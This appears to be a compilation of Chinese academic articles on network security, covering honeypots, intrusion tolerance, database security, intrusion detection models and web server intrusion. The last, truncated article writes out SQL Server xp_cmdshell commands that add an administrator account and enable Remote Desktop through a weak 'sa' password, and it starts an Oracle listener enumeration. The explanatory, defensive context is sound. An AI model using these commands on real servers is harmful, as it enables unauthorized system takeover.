构建一个有用的蜜罐系统是一个十分复杂的过程, 主要涉及到蜜罐的伪装、采集信息、风险控制、数据分析。其中, 蜜罐的伪装就是将一个蜜罐系统通过一定的措施构造成一个十分逼真的环境, 以吸引入侵者。但蜜罐伪装的难度是既不能暴露太多的信息又不能让入侵者产生怀疑。最初采用的是伪造服务, 目前主要采用通过修改的真实系统来充当。蜜罐系统的主要功能之一就是获取入侵者的信息, 通常是采用网络sniffer或IDS来记录网络包从而达到记录信息的目的。虽然蜜罐系统可以获取入侵者的信息, 并能有效的防护目标, 但蜜罐系统也给系统带来了隐患, 如何控制这些潜在的风险十分关键。蜜罐系统的最后一个过程就是对采用数据的分析。通过分析就能获得需要的相关入侵者规律的信息。

对于设计蜜罐系统, 主要有三个步骤:首先, 必须确定自己蜜罐的目标。因为蜜罐系统并不能完全代替传统的网络安全机制, 它只是网络安全的补充, 所以必须根据自己的目标定位蜜罐系统。通常蜜罐系统可定位于阻止入侵、检测入侵等多个方面。其次, 必须确定自己蜜罐系统的设计原则。在这里不仅要确定蜜罐的级别还有确定平台的选择。目前, 对用于研究目的的蜜罐系统一般采用高交互蜜罐系统, 其目的就是能够更加广泛的收集入侵者的信息, 获取需要的资料。在平台的选择上, 目前我们选择的范围很有限, 一般采用Linux系统。其原因主要是Linux的开源、广泛应用和卓越的性能。最后, 就是对选定环境的安装和配置。

三、蜜罐系统在网络中的应用

为更清晰的研究蜜罐系统, 将蜜罐系统应用于具体的网络中。在我们的研究中, 选择了一个小规模的网络来实现。当设计完整个网络结构后, 我们在网络出口部分配置了设计的蜜罐系统。在硬件方面增加了安装了snort的入侵检测系统、安装了Sebek的数据捕获端。并且都构建在Vmware上实现虚拟蜜罐系统。在实现中, 主要安装并配置了Honeyd、snort和sebek.其蜜罐系统的结构图, 见图1。

论文从入侵诱骗技术入手系统的分析了该技术的发展历程, 然后对入侵诱骗技术中的蜜罐系统进行了深入的研究, 主要涉及到蜜罐系统的分类、设计原则、设计方法, 最后, 将一个简易的蜜罐系统应用于具体的网络环境中, 并通过严格的测试, 表明该系统是有效的。

摘要：入侵诱骗技术是近年来网络安全发展的一个重要分支, 论文从入侵诱骗技术的产生入手简要的介绍了它的发展, 同时对目前流行的蜜罐系统进行了深入的研究, 主要涉及到蜜罐系统的分类、蜜罐系统的优缺点、蜜罐系统的设计原则和方法, 最后将一个简易的蜜罐系统应用于具体的网络。

关键词：入侵诱骗技术,蜜罐,网络安全

参考文献

[1]Bill Cheswick.An Evening with Berferd In Which a Cracker is Lured, Endured, and Studied.Proceedings of the Winter1992Usenix conference, 1992

基于网络安全的入侵容忍技术研究 第8篇

近年来,电子商务、电子政务、证券等网络技术与网络应用的迅猛发展,对计算机网络的依赖越来越强,数据的安全问题也愈加重要;由于计算机所使用的操作系统、应用软件,以及网络使用的协议都存在其脆弱性和漏洞,计算机的用户就不断地寻找更新更强的杀毒软件和防火墙,不断地对系统进行堵漏,然而魔高一尺道高一丈,用户总是被牵着鼻子走,堵来补去,用户被弄得筋疲力尽。

那能否换个思路,不去单一防和堵,而是从数据库事物的角度出发,入侵来临时,能采取有效措施主动保护受侵害系统继续为用户提供尽可能最大化的服务,用新的途径来解决这些安全问题,一种更深层次的安全技术——容忍入侵技术产生了,那就是入侵容忍技术。

系统在被攻击、错误和突发事故的情况下,仍然可以及时地完成使命、为用户提供服务的能力。这种技术就是对传统的网络安全技术的突破,融合了传统网络安全技术中的容灾、容侵、可靠性设计等技术。它以网络的实际情况为依据,假设网络中的任何一个节点都可能因为攻击、故障和意外事故等失效,已成为网络安全研究的新方向。这就是入侵容忍技术的核心技术。

1. 入侵容忍技术的概念

入侵是指任何企图破坏资源的完整性、保密性和有效性的行为,也是指违背系统安全策略的任何事件。

入侵容忍技术的概念最早是于1985年提出,在1991年开发了一个具有入侵容忍功能的分布式计算系统,其相关研究工作是由近几年随着OASIS(美国国防部高级研究计划署计划)和MAFTIA(欧盟的研究计划)等项目的研究而发展起来。

入侵容忍技术属于第三代网络安全技术,强调可生存能力是当前信息安全领域的热点之一。所谓可生存,是指系统在攻击、错误和突发事故发生的情况下,仍可及时完成使命的能力。它假设我们不能完全正确检测系统的入侵行为,当入侵和故障突然发生时,能够利用“容忍”技术来解决系统的“生存”问题,以确保信息系统的保密性、完整性、真实性、可用性和不可否认性。容忍入侵技术主要考虑在入侵存在的情况下系统的可生存性,所关注的是入侵造成的影响而不是入侵的原因,本质上讲是一种使系统保持幸存术。

一个入侵容忍系统应能够阻止和预防攻击的发生;能够检测攻击和评估攻击造成的破坏;在遭受攻击后,能够维护和恢复关键数据、关键服务或完全服务。入侵容忍应用可根据被保护的对象分为两类:对服务的入侵容忍,主要研究系统在面临攻击的情况下,仍能为预期的合法用户提供有效服务的方法和机制;对数据的入侵容忍,主要研究面临攻击的情况下如何保证数据的机密性和可用性。

2. 网络入侵容忍技术特征与功能

基于网络安全的入侵容忍技术就是要求网络中的任何单点发生故障不影响整个网络系统的运转。入侵容忍可通过对权力分散及对技术上单点失效的预防,保证任何少数设备、任何局部网络、任何单一场点都不可能做出泄密或破坏系统的事情,任何设备、任何个人都不可能拥有特权。然而以往的网络安全事件告诉人们,网络的安全仅依靠“堵”和“防”是不够的。

入侵容忍技术就是基于这一思想,要求系统中任何单点的失效或故障不至于影响整个系统的运转。由于任何系统都可能被攻击者占领,因此,入侵容忍系统不相信任何单点设备,能够有效地防止内部犯罪事件发生。

入侵容忍系统必须具有多种能力。

(1)自我诊断能力。入侵容忍依赖检测或评估系统,通过检测到局部系统的失效或估计到系统被攻击,然后调整系统结构,重新分配资源,从而达到继续服务的目的。

(2)故障隔离能力。如果诊断部分认为某种操作可能会严重影响后续的系统隔离机制会将可疑的操作隔离到特殊区域。针对被隔离的数据操作,当判决系统认为确实是攻击时,就将被隔离的操作删除掉。反之,就将这些隔离的内容融合到正确的系统中去。

(3)还原重构能力。具有入侵容忍能力的系统必须修正所有被攻击影响到的数据,而又不能采用简单的回退恢复。系统必须保证未被感染的部分不被恢复,仅仅还原被感染的文件,让用户大部分工作得以保留。

3. 入侵容忍技术研究现状与存在的问题

3.1 国内外的入侵容忍技术研究现状

近几年来,以美国的计划和一系列计划以及欧盟高级研究计划资助为主体,国外学术界对容忍人侵的相关问题展开了大量研究,并取得了许多丰富的成果。相关的研究主要包括:

(1)使用监控、接受测试以及冗余等容错手段实现基于构件的容忍人侵应用系统,如服务器系统和数据库系统等。

(2)容忍入侵系统,特别是基于门限密码秘密共享的容忍人侵系统实现和运行中的一些细节问题研究,如等异步结构模型中容忍人侵方法的实现问题。

(3)综合运用各种容错策略和系统可重配置机制,结合安全通信以及基于人侵检测、人侵遏制和错误处理等手段和机制,构建纵深防御的容忍入侵安全防线。

我国信息安全领域的许多专家学者也认识到了容忍人侵容忍技术对于信息安全技术发展的至关重要性。中科院信息安全国家重点实验室、国防科技大学、解放军信息工程大学等有关的课题组近几年都开展了这方面的思考和研究,并取得丰富的成果。其中,崔竞松、彭文灵等分别提出了一种并行容忍人侵容忍系统研究模型,朱建明、史庭俊等提出了基于秘密共享的多代理容忍人侵系统模型以及容忍人侵的数据库系统模型等,郭渊博和马建峰给出了基于大数表决机制的自适应容忍入侵框架模型。

可以看出,尽管目前国内关注容忍人侵容忍研究领域的业内人士关注比较多,但研究的广度还有所欠缺,研究工作总体而言主要偏重于基于门限密码秘密共享理论的容侵模型与系统设计。

3.2 目前入侵容忍技术的存在的问题

根据我们对国内外的研究现状分析可以看出,容忍人侵的研究目前还是相对比较分立,没有形成完整系统理论。在容忍人侵的理论与技术方面,特别是在自适应容忍人侵理论与实践方面,目前仍存在一定的问题,未达到实用化的程度。例如早期基于门限密码秘密共享的容忍入侵都采用静态的基于状态机复制的模型,其缺点就是不能抵抗移动攻击者的攻击。

在当前的容忍人侵容忍领域,人们普遍采用失效可表现出任意行为的失效模型对人侵者对系统的人侵容忍结果进行建模。然而,在现实应用中,由于容忍人侵容忍领域中发起攻击人侵的根源在人,安全威胁都具有一定的自适应性,因此不满足随机性,不能简单地用概率模型表示。只能够针对有计划或按部就班的攻击,无法防御未定义的攻击或现有攻击的变种。对于如何根据系统当前状态、安全性以及环境参数等的变化情况,对容忍人侵系统的配置和相应运行参数进行动态调整,以实现容忍人侵系统的自适应重配置等问题,则需要进一步的研究。

4. 结论与展望

容忍人侵是信息安全领域前沿的研究课题,有着广阔的应用空间,入侵容忍技术的研究的目标也不是通过技术手段完全杜绝恶意用户或攻者脆弱性的利用或攻击。建设入侵容忍系统也不是如何构造绝对安全的系统,建设一个绝对阻止入侵破坏的系统是不现实的。

入侵容忍系统承认系统中存在脆弱点,并假定其某些脆弱点可能会被入侵者利用;入侵容忍设计目的是使设计的系统在受到攻击时,即使某些部分或部件受到破坏,或者被恶意攻击者操控时,系统能够触发相应的安全防护机制,能对用户继续维护正常的基本或关键服务。由于这种方法考虑对系统可用保护的同时,还考虑了对系统其它安全属性的保护,因此能够达到信息系统安全的纵深防御的目的,可以说入侵容忍技术是系统安全防护中的最后防线,是非常值得关注的研究方向。

摘要：随着信息化进程的加快,计算机病毒、网络攻击等网络安全问题已成为信息时代人类面临的共同挑战。入侵容忍是网络安全领域的一种新策略,它在系统在遭受攻击时,仍然保证连续地提供服务,即使系统某些部分已被破坏,它也能提供降级服务。本文着重介绍入侵容忍概念,功能特点,展望入侵容忍发展的趋势。

关键词：网络安全,入侵容忍,降级服务

参考文献

[1]荆继武,周天阳.Internet上的入侵容忍服务技术[J]国科学院研究生院学报,2010,(02).

[2]薛冬梅.网络安全技术的新亮点——入侵容忍系统简介[J].计算机与网络,2009,(24).

[3]黄建华,宋国新.入侵容忍技术在身份认证系统中的应用[J].华东理工大学学报,2010,(03).

[4]李长勇,夏敏.BP神经网络在电于设备可靠性验证中的应用[J].军械工程学院学报、2008,(01).

数据库安全及防范入侵的研究 第9篇

1 数据库安全机制

1.1 数据库的安全机制

数据库只有通过安全机制才能实现其相应的安全策略,目前,最常见的安全机制主要有以下几个方面:

(1)标识与认证

标识指的是让系统明确具体用户的身份及相应的权限,数据库系统一般都是通过用户名(ID)和密码来进行控制的。认证是对系统对用户身份的验证。数据库管理系统的使用首先就是进行标识和认证,这也是数据库系统安全运行的基础。随着IT行业的不断发展,对用户的标识和认证技术也在不断地进步,除录入ID及密码方法外,还有智能卡验证及生物认证等新型技术手段。

(2)访问控制

当用户对数据库发送相关的访问请求时,数据库系统会根据用户的标识和认证,对其权限进行分析,以确定用户的访问权限规则。当前访问控制的类型主要有:MAC(强制访问控制)、DAC(自主访问控制)和RBAC(基于角色的访问控制)。

MAC的基本思想是:首先对用户和数据库中的具体对象制定其相应的安全级别,并对其安全级别设置对应的规则,通过匹配规则的方式来确定用户是否能够正常读取或写入其对应的数据。

DAC的基本思想是:根据主体的身份对客体访问进行有效的约束,需要注意的是,该方式主要对单一用户起作用。

RBAC的基本思想是:将整个系统分为角色、用户、权限、对象及操作等5个属性。对每一个角色都分配其对应的权限,用户假如要使用某一权限,那么首先要成为对应的角色成员。一般来说,每一个角色获取其最小范围的使用权限。

(3)审计

对数据库系统的一切操作都进行记录,对审计日志进行分析,可以有效地分析出具体用户对数据库的操作情况,对内部攻击和外部攻击进行识别,发现其非法入侵用户,有针对性地对造成数据库状况的操作进行处理。

(4)数据加密

数据库的数据要在网络中进行传输和存储,不可避免地被非法分子进行窃取,利用数据加密可以有效地保护数据库中数据的安全。

(5)数据备份

当数据库受到不可恢复的破坏时,为了让系统及时恢复运行,对数据库中的数据及时进行备份,可以让系统恢复至破坏前状态,保证系统的正常运行。

1.2 安全机制的不足

数据库的安全机制提供了系统安全的基本保障,但这些并不足以将所有的隐患排除,其不足之处体现在:数据库系统是安装在操作系统之上的,在互联网日益发达的今天,黑客可以利用各种方式轻松入侵操作系统,这让操作系统平台上的数据库的安全受到极大的挑战;用户认证的不足主要是非法用户一旦获取了合法的账号密码,那么非法用户就可以顺利进行了数据库之中进行操作和处理,对数据的安全形成极大的危害;审计的不足体现在只能在事后对入侵事件进行分析,而不能及时发现并处理入侵事件。

2 非法入侵数据库的过程

非法用户入侵数据库系统之前,会对相关的信息进行收集,明确其入侵的目标,查找其待攻击目标系统的安全漏洞,并针对其漏洞制定相应的攻击策略,对其进行入侵并进入系统。非法用户会根据所进入系统的权限对数据库系统中的数据进行访问及操作,获得其有用的信息或对系统进行深一步的破坏。并在此权限的基础上,获得更高的权限,在系统中安装对应的木马,以便于下一次的入侵,找出自身相关操作的审计日志中记录并删除。

非法用户入侵数据库系统主要采取以下几种方式:

(1)破解口令

对于研发人员和设计人员来说,对于系统口令的保密机制重要性有清晰的认识,在口令的设置方面,都采用比较复杂的口令。而对于用户来说,则对于口令重要性认识不足,在口令的设置方面,为了便于每一次的登录,口令设置的相对比较简单,这就给非法用户可趁之机,非法用户利用穷举法的方法进行强制破解,从而让非法用户轻松取得了相关账户的所有权,给系统带来危害。

(2)变更权限

权限的变更主要是指非法用户通过获取额外的权限,可以操作和访问本不应该操作的数据信息,这是比较常见的入侵手段,非法用户的权限超出了自身的工作范围。

(3)利用数据库服务漏洞

在数据库中,有些服务及功能在系统的运行中不需要使用,非法用户利用该服务对系统进行非法登录。例如:Oracle数据库中的监听器,一般用户都会给数据库提供用户及密码,但是监听器的密码一般都不会设置。而监听器对数据库的网络连接进行连接,使数据库与用户的连接泄露。

(4)SQL注入

用户利用数据库中的SQL语句以获取相关的数据库的相关信息,当SQL语句提交给数据库并运行,此时就形成SQL的注入攻击,利用其相关的查询代码,数据库会根据SQL语句的运行返回其相关的结果,从而从数据库中提取有价值的数据信息,利用这些信息取得对数据库的控制。

SQL注入是当前最流行的入侵方法,它是利用应用程序和数据库的漏洞,在利用SQL注入以前,入侵者已经取得了系统的身份验证,并且在数据库中得到验证,此时用户将非法的SQL语句移值到数据库中运行时,数据库并不认为其非法,从而对数据库的安全造成了一定的损害。

(5)获取备份数据

数据库系统为了保障系统在受到破坏时,能够及时恢复,会对整个数据库进行定期的备份,假如这些备份数据被非法用户获取,那么就会利用备份数据的恢复从而得到原数据库中的信息。

3 入侵检测系统

3.1 基本思想

应用程序的开发、设计、运行及管理维护主要过程如图1所示,主要由人(用户、管理员、程序员等)、中间件(应用程序、开发工具、操作系统、数据库管理工具等)和数据库组成。

根据如图1所示,可知在整个系统的设计中,SQL语句的结构、执行顺序都是固定的,不合法的SQL语句会把SQL语句的执行顺序破坏。因此入侵检测系统的设计可以从检测SQL语句的结构、操作行为及系统的操作步骤等几个方面进行入手。从而迅速地查出系统中非法SQL语句的执行,并第一时间进行报警处理。

3.2 系统构成

根据其系统的基本思想对系统进行分析,将整个系统划分为数据采集、SQL解析、SQL检测、行为检测和响应单元5个模块,其结构如图2所示。

3.3 SQL解析模块

SQL解析模块在整个系统中占据着十分重要的地位,其解析主要由两部分组成,首先利用串匹配技术对系统中待运行的SQL语句进行关键字识别,其次利用有限自动机对语句进行分析。其核心代码如下所示:

4 结语

针对数据库安全展开研究,并在SQL注入攻击模式下,设计了相关的检测系统。

参考文献

[1]李飞.信息安全理论与技术[M].西安:西安电子科技大学出版社,2010.

[2]高延玲.网络数据库研究与应用.西安电子科技大学出版社,2004:21-28.

[3]蔡红柳,何新华.信息安全技术及应用实验.北京:科学出版社,2005.

基于入侵检测的网络安全体系研究 第10篇

对于现在计算机与网络技日益发展的信息时代，信息安全成为我们重点关注的研究项目。对于用户来说，现在面临的安全性威胁主要有以下几个方面：病毒问题，非法访问和破坏（"黑客"攻击），管理的欠缺，网络的缺陷及软件的漏洞或"后门"四个主要方面。对于管理的欠缺是主观的人员管理带来的安全性威胁，可以加强管理制度的建全来防御；而其它三方面都是基于计算机技术及网络技术带来的安全性威胁，可以通过提高安全技术来防范的。入侵检测技术就是为了信息的安全提出来的一项比较行之有效的防御技术。

2、入侵检测的相关技术

入侵检测是指"通过对行为、安全日志或审计数据或其它网络上可以获得的信息进行操作，检测到对系统的闯入或闯入的企图"（参见国标GB/T18336）。入侵检测是检测和响应计算机误用的学科，其作用包括威慑、检测、响应、损失情况评估、攻击预测和起诉支持。入侵检测技术是为保证计算机系统的安全而设计与配置的一种能够及时发现并报告系统中未授权或异常现象的技术，是一种用于检测计算机网络中违反安全策略行为的技术。进行入侵检测的软件与硬件的组合便是入侵检测系统（In-trusion Detection System, 简称IDS) 。

入侵检测从技术上划分，有两种检测模型：

(1）异常检测模型（Anomaly Detection）：检测与可接受行为之间的偏差。如果可以定义每项可接受的行为，那么每项不可接受的行为就应该是入侵。首先总结正常操作应该具有的特征（用户轮廓），当用户活动与正常行为有重大偏离时即被认为是入侵。这种检测模型漏报率低，误报率高。因为不需要对每种入侵行为进行定义，所以能有效检测未知的入侵。

(2）误用检测模型（Misuse Detection）：检测与已知的不可接受行为之间的匹配程度。如果可以定义所有的不可接受行为，那么每种能够与之匹配的行为都会引起告警。收集非正常操作的行为特征，建立相关的特征库，当监测的用户或系统行为与库中的记录相匹配时，系统就认为这种行为是入侵。这种检测模型误报率低、漏报率高。对于已知的攻击，它可以详细、准确地报告出攻击类型，但是对未知攻击却效果有限，而且特征库必须不断更新。

入侵检测按照检测对象划分

(1）基于主机：系统分析的数据是计算机操作系统的事件日志、应用程序的事件日志、系统调用、端口调用和安全审计记录。主机型入侵检测系统保护的一般是所在的主机系统。是由代理（agent）来实现的，代理是运行在目标主机上的小的可执行程序，它们与命令控制台（console）通信。

(2）基于网络：系统分析的数据是网络上的数据包。网络型入侵检测系统担负着保护整个网段的任务，基于网络的入侵检测系统由遍及网络的传感器（sensor）组成，传感器是一台将以太网卡置于混杂模式的计算机，用于嗅探网络上的数据包。

(3）混合型：基于网络和基于主机的入侵检测系统都有不足之处，会造成防御体系的不全面，综合了基于网络和基于主机的混合型入侵检测系统既可以发现网络中的攻击信息，也可以从系统日志中发现异常情况。

入侵检测过过程分为三部分：信息收集、信息分析和结果处理。

(1）信息收集：入侵检测的第一步是信息收集，收集内容包括系统、网络、数据及用户活动的状态和行为。由放置在不同网段的传感器或不同主机的代理来收集信息，包括系统和网络日志文件、网络流量、非正常的目录和文件改变、非正常的程序执行。

(2）信息分析：收集到的有关系统、网络、数据及用户活动的状态和行为等信息，被送到检测引擎，检测引擎驻留在传感器中，一般通过三种技术手段进行分析：模式匹配、统计分析和完整性分析。当检测到某种误用模式时，产生一个告警并发送给控制台。

(3）结果处理：控制台按照告警产生预先定义的响应采取相应措施，可以是重新配置路由器或防火墙、终止进程、切断连接、改变文件属性，也可以只是简单的告警。

3、IDS通用系统模型

为解决入侵检测系统之间的互操作性，国际上的一些研究组织开展了标准化工作，目前对IDS进行标准化工作的有两个组织：IETF的Intrusion Detection Working Group (IDWG）和Common Intrusion Detection Framework (CIDF）。CIDF阐述了一个入侵检测系统（IDS）的通用模型。它将一个入侵检测系统分为以下组件：事件产生器（Event generators），用E盒表示；事件分析器（Event analyzers），用A盒表示；响应单元（Responseunits），用R盒表示；事件数据库（Event databases），用D盒表示。

CIDF模型的工作原理如下：E盒通过传感器收集事件数据，并将信息传送给A盒，A盒检测误用模式；D盒存储来自A、E盒的数据，并为额外的分析提供信息；R盒从A、E盒中提取数据，D盒启动适当的响应。A、E、D及R盒之间的通信都基于GIDO (generalized Intrusion detection objects，通用入侵检测对象）和CISL (common intrusion specification language，通用入侵规范语言）。如果想在不同种类的A、E、D及R盒之间实现互操作，需要对GIDO实现标准化并使用CISL。

4、基于入侵检测系统结构体系

1、简单网络环境下的入侵检测结构体系

2、复杂网络环境下的入侵检测结构体系

5、系统组成分析[5]

控制台-Windows平台图形界面程序，负责引擎集中管理、定制策略、警报；实时显示、定制报表。

网络引擎-预装软件的工控机。负责网络数据的获取、分析、检测；对警报进行过滤和实时响应。

主机引擎-后台运行的代理程序。负责采集分析指定的系统数据；根据策略进行报警和响应。

6、结束语

入侵检测作为一种积极主动地安全防护技术，提供了对内部攻击、外部攻击和误操作的实时保护，在网络系统受到危害之前拦截和响应入侵。从网络安全立体纵深、多层次防御的角度出发，入侵检测理应受到人们的高度重视，这从国外入侵检测产品市场的蓬勃发展就可以看出。在国内，随着上网的关键部门、关键业务越来越多，迫切需要具有自主版权的入侵检测产品。但现状是入侵检测仅仅停留在实现一些简单功能的阶段，或者是防火墙中集成较为初级的入侵检测模块。可见，入侵检测产品仍具有较大的发展空间，从技术途径和研究开发角度来讲，我们认为，除了完善常规的、传统的技术（模式识别和完整性检测）外，应重点加强新技术的研究和IDS基础研究，如模型和体系结构的研究。

参考文献

[1].莫足琴.入侵检测技术综述[J].计量与测试技术, 2005, (12)

[2].杨阳.浅谈计算机入侵检测系统的建构[J].中国科技信息, 2007, (01)

[3].王勇, 高亮.网络入侵异常检测的实时方法[J].桂林电子工业学院学报, 2005, (05) .

[4].罗峰.入侵检测系统与技术研究[J].电脑知识与技术, 2006, (17)

[5].赵玲.基于入侵检测技术的网络安全分析[J].西安邮电学院学报, 2006 (05)

安全入侵 第11篇

关键词:计算机网络;计算机安全;入侵检测;程序开发

中图分类号:TN915.08 文献标识码:A文章编号:1007-9599 (2010) 04-0000-02

Application of Intrusion Detection in Computer Security Protection

Yin Xiaogui

(Guangzhou University,Software&Engineering College,Conghua510990,China)

Abstract:This paper firstly analyzed the computer network security.It pointed out the main network security protection measures and their shortcomings.Intrusion detection technology is a beneficial supplement,Further more,it made a summarise of intrusion detection technology and application examples are given about intrusion detection in computer security protection.Some operation result and algorithm framework were disscussed.

Keywords:Computer network;Computer security;Intrusion detection;Program development

网络技术,特别是Intenret的发展极大地促进了社会信息化的发展,人们的生活、工作和学习等己经越来越离不开Internet。但是由于Internet本身设计上的缺陷以及其具有的开放性,使其极易受到攻击,给互联网的信息资源带来了严重的安全威胁。一个安全的计算机信息系统至少需要满足以下三个要求,即数据的机密性、完整性和服务的可用性。为了能够实现这种计算机信息系统的安全性,那么计算机安全软件就成了一个必不可少的工具。

一、计算机网络安全

(一)传统的计算机网络安全手段

所以计算机系统的安全问题是一个关系到人类生活与生存的大事情,必须充分重视并设法解决它。如何确保网络系统不受黑客和工业间谍的入侵,已成为企事业单位健康发展所必需考虑和解决的重要问题。

一般来说,传统的网络安全技术有:(1)功能强大的防火墙。“防火墙”技术是通过对网络作拓扑结构和服务类型上的隔离来加强网络安全的手段。它所保护的对象是网络中有明确闭合边界的一个网块,它的防范对象是来自被保护网块外部的对网络安全的威胁。(2)进行网络的合理分段与隔离控制。网络分段是保证安全的一项重要措施,同时也是一项基本措施,其指导思想在于将非法用户与网络资源相互隔离,从而达到限制用户非法访问的目的。(3)系统的设置与更新。关闭不需要的使用端口,及时的对操作系统漏洞进行更新。(4)木马与病毒防护软件的应用。安装功能强大的杀毒、除木马的软件,并且及时的对病毒库进行更新。它利用从服务器端获取的病毒码信息对本地工作站进行病毒扫描,并对发现的病毒采取相应措施进行清除。

(二)传统方式的不足与入侵检测的必要性

虽然已经有相当多的成熟技术被应用于增强计算机系统的安全性,但随着新应用特别是基于网络的新服务的层出不穷,这些传统的静态安全保障技术的有效性正受到日益严峻的挑战:由于信息安全知识的缺乏及管理上的松懈,再加上没有受过相关信息安全教育的用户数量的激增,各组织中计算机用户的密码通常设置得并不安全,简单的字典攻击就可以成功地破获相当一部分用户的密码,高强度的密码体系常常形同虚设;有效的报文鉴别技术如MDS算法,并没有在广大普通计算机用户中得到广泛使用,加上来自组织内部合法用户的攻击行为,计算机网络中所传输的信息的完整性通常也很成问题;拒绝服务攻击Dos,特别是由众多攻击者协同发动的分布式拒绝服务攻击田Dos,由于其攻击时所带来的巨大的数据流量,可以轻易地使被攻击的网络服务器软硬件系统过载,从而丧失服务能力,极大地威胁着信息系统。

入侵检测系统具有比各类防火墙系统更高的智能,并可以对由用户局域网内部发动的攻击进行检测。同时,入侵检测系统可以有效地识别攻击者对各种系统安全漏洞进行利用的尝试,从而在破坏形成之前对其进行阻止。当检测到来自内外网络针对或通过防火墙的攻击行为,会及时响应,并通知防火墙实时阻断攻击源,从而进一步提高系统的抗攻击能力,更有效地保护网络资源,提高防御体系级别。

二、入侵检测技术的发展概述

入侵检测是提高网络安全性的新方法,其主要目的是检测系统或网络是否遭到攻击,是否有来自内部或外部的攻击者,如果有则应采取一定的反应措施。初期多以基于本机的入侵检测系统为主,即在每一主机上运行一个或多个代理程序。它以计算机主机作为日标环境,只考虑系统局部范围的用户,因此人人简化了检测任务。由入侵检测工具对主机的审计信息进行分析与检测,并报告安全或可疑事件。基于本机的入侵检测技术已经比较成熟,开发出的入侵检测系统也比较多,部分己形成了实用产品,例如Intrusion Detection公司的Kane SecurityMonitor, Trusted Information System公司的Stalk。

日前,基于网络的入侵检测系统的商业化产品较多,多为基于网络关键结点(如防火墙、路由器等)进行检测,如Cisco公司的VetRangero基于主机的入侵检测系统需要在所有受保护的主机上都安装检测系统,配置费用高,所以实际应用较多的是网络型的入侵检测系统。但是高带宽网络、交换式网络、VLAN、加密传输的发展都对基于网络的入侵检测造成了很大限制,所以现在主流的基于网络的入侵检测系统是两者结合。基于网络的入侵检测系统的发展主要面向大型网络。目前国内只有少数的网络入侵检测软件,相关领域的系统研究也刚刚起步,与外国尚有差距。

三、漏洞扫描与入侵检测协作系统的应用

(一)系统的基本原理

本文应用漏洞扫描与入侵检测协作系统进行合作,来构建入侵检测系统。系统由中央控制器、用户界面及分布在各个子网中的扫描节点、检测节点组成,每个扫描节点负责扫描自己所在网段的主机及子网,从中发现安全漏洞并提出修补措施,从而避免了防火墙的访问限制,能够获得准确的扫描结果;各检测节点根据本节点的检测策略,对本子网或其它检测节点提供的系统数据进行分析,如果发现入侵,则根据相应的安全策略进行响应。

(二)系统设置

针对特定的攻击,设置攻击的源IP,端口,及子网掩码,目的IP,端口,及子网掩码,然后选择要拦截或放行的协议类型。每一次设置相当于一条记录,可以设置多条记录,攻击模式库即由这些记录共同构成。设置完攻击模式库后,点击install rule 实现库的安装。首先在CMainFrame类的OnRulesAdd()函数接收用户输入,并把设置的规则添加到文档类里面的的m_rules数组里面。

(三)截包方案

本部分采用应用层截包方案,即在驱动程序中截包,然后送到应用层处理的工作模式。程序工作在内核的话,稳定性/兼容性都需要大量测试,而且可供使用的函数库相对于应用层来说相当少。在应用层开发,调试修改相对要容易地多。在应用层工作,改变了工作模式,每当驱动程序截到数据,送到应用层处理后再次送回内核,再向上传递到IP协议。所以需要看到这样性能影响非常大,效率非常低。 不过由于台式机的网络负载相当小,不到100Mbps足以满足要求,尤其是主要用于上网等环境,网络连接的流量不到512Kbps,根本不用考虑性能因素。所以综合考虑各种因素,本部分决定采用应用层的截包方案。

在设备程序开发包(DDK)中,微软包含一个新的命名为Filter-Hook Driver的网络驱动程序。可以用它建立一个函数来过滤所有所有通过这个接口的流量。System32drivers目录下的IPFLTDRV.SYS是Microsoft提供的IP协议过滤驱动程序。它允许用户注册自己的IP数据报处理函数。本程序采用 DrvFltIp.sys 驱动程序实现IP协议过滤。其中回调函数是这类驱程的主体部分。DrvFltIp.sys IP过滤驱动程序使用这个过滤钩子来判断IP数据包的处理方式。

(四)中央控制

控制管理负责协调控制网络中的扫描节点和检测节点,包括:向节点发送控制指令及接收各节点的工作状态;负责对分布到网络上的各节点的数字签名及安全策略的配置;负责各检测节点间的负载均衡,如果某个检测节点的负载较重,则控制管理将该节点的一部任务分配到其它较空闲的检测节点。这里尤其需要进行通信管理,通信管理主要提供控制管理、数据融合与底层各个扫描节点、检测节点的通信通道。具体说来,控制管理可以通过通信管理给检测节点下达控制指令,同时通信管理也将各节点的执行情况返回给控制管理;数据融合可以通过通信管理要求底层节点提供更多的事件记录信息,同时,通信管理负责将返回的记录提交给数据融合模块进行分析。通信管理负责中央控制器与各扫描节点、检测节点之间的认证,并采用通信加密体制完成信息和消息的传送。系统运行界面如下图所示。

参考文献:

[1]白以恩.计算机网络基础及应用[M].黑龙江:哈尔宾工业大学出版社,2003

[2]韩东海,王超,李群.入侵检测系统实例剖析[M]。北京:清华大学出版社,2002

[3]FISK M, VARGHESE G. An Analysis of Fast String Matching Applied,to Content-Based Forwarding and Intrusion Detection[R).University of California-San Diego,2002.

浅谈Web服务器入侵与安全防护 第12篇

关键词：B/S服务器,入侵分析,安全防护

近年来,计算机普及、互联网INTERNET飞速发展。B/S端类型的服务业务平台已在教育、政企、科研等多个领域中得到广泛的应用,很多企业都将应用系统从C/S类型向B/S类型转变,如财务管理系统、飞机售票系统、高校教务系统等。B/S端信息系统已在各行各业普及使用,如何有效解决Web服务器的安全是信息化成功、企业稳定发展的关键,也是推广Web业务不可缺少的前提因素。

1 入侵Web服务器方式分析

1.1 SQL入侵

Sa弱口令入侵。Sa是SQLServer的管理员帐号,拥有最高权限,它可以执行扩展存储过程,并获得返回值,正因为这样,如安装在Web服务器中SQL数据库sa用户的口令给黑客获得的话,黑客就可以在Web服务器为所欲为。入侵过程如下:

首先有sql查询分析器连接上Web服务器上的SQL数据库,在查询分析器上输入”exec sp_addextendedproc'xp_cmdshell''Xplog70.dll'”命令执行,目的让对方数据库SQL的存储过程xp_cmdshell能够正常有权限被使用。

接着在查询分析器里添加一个管理员用户,语句为“exec master..xp_cmdshell'net user ceshi 98765321/add';exec master.xp_cmdshell'net localgroup administrators ceshi/add'”。

最后在查询分析器里开启远程计算机的远程桌面服务,语句为“

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp/v EnableWinStation/t REG_DWORD/d 1“。

1.2 Oracle入侵

ORACLE数据库默认安装以后有很多帐户密码都是默认的,如果管理员安全意识不高很容易被人利用从而获得系统权限。

首先要使用lsnrctl得到对方的SID号。使用lsnrctl工具连接对方IP的listener,在CMD里输入lsnrctl进入lsnrctl后执行Se current_listener目标IP和Status命令,这个时候可以看到服务china和modose这2个有一个是SID号;

